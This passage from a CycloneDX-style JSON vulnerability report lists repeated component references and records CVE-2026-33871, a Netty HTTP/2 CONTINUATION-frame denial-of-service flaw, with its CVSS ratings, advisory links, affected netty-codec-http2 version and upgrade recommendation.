{ "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#729b36ac-f61c-4af9-992b-191847755d85" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#1379fc43-b58d-4eaa-9588-f77e3393bb6b" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#13b04c78-11a2-49c3-a694-0ecfd36fc7ce" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#25be6a4b-fbcc-48f1-9947-6257a9d096c2" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#61c91d25-b0e0-4ce6-9bf8-37a0aa7b094f" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#21edbe28-c7a0-401a-a6f3-9082bf6112d8" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#fbe4656c-3fd5-4515-ab7f-a6cc817aec0e" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518" } ], "analysis": { "state": "not_affected", "justification": "protected_at_runtime", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-33871", "source": { "name": "ghsa", "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven" }, "ratings": [ { "source": { "name": "nvd" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "redhat" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "cwes": [ 770 ], "description": "Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.132.Final and 4.2.10.Final, a remote user can trigger a Denial of Service (DoS) against a Netty HTTP/2 server by sending a flood of `CONTINUATION` frames. The server's lack of a limit on the number of `CONTINUATION` frames, combined with a bypass of existing size-based mitigations using zero-byte frames, allows an user to cause excessive CPU consumption with minimal bandwidth, rendering the server unresponsive. Versions 4.1.132.Final and 4.2.10.Final fix the issue.", "recommendation": "Upgrade io.netty:netty-codec-http2 to version 4.1.132.Final, 4.2.11.Final", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-33871" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-33871" }, { "url": "https://github.com/netty/netty" }, { "url": "https://github.com/netty/netty/security/advisories/GHSA-w9fj-cfpg-grvv" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33871" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-33871" } ], "published": "2026-03-27T20:16:34+00:00", "updated": "2026-03-30T20:10:17+00:00", "affects": [ { "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.130.Final", "versions": [ { "version": "4.1.130.Final", "status": "affected" } ] }, { "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.130.Final", "versions": [ { "version": "4.1.130.Final", "status": "affected" } ] }, { "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.130.Final", "versions": [ { "version": "4.1.130.Final", "status": "affected" } ] }, { "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.130.Final", "versions": [ { "version": "4.1.130.Final", "status": "affected" } ] }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#540e52db-abb1-48d9-a50b-9b89f495c3c7" }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#540e52db-abb1-48d9-a50b-9b89f495c3c7" }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#540e52db-abb1-48d9-a50b-9b89f495c3c7" }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#540e52db-abb1-48d9-a50b-9b89f495c3c7" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0e02b9e7-23db-433d-bec3-3b14e9c311f3" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0e02b9e7-23db-433d-bec3-3b14e9c311f3" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0e02b9e7-23db-433d-bec3-3b14e9c311f3" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0e02b9e7-23db-433d-bec3-3b14e9c311f3" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#4e279986-5752-4b93-9f99-e67176e42bb0" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#4e279986-5752-4b93-9f99-e67176e42bb0" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#4e279986-5752-4b93-9f99-e67176e42bb0" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#4e279986-5752-4b93-9f99-e67176e42bb0" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#3ad287ba-29f8-47a4-9fdd-cdc6bf54d6ee" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#3ad287ba-29f8-47a4-9fdd-cdc6bf54d6ee" }, { "ref": 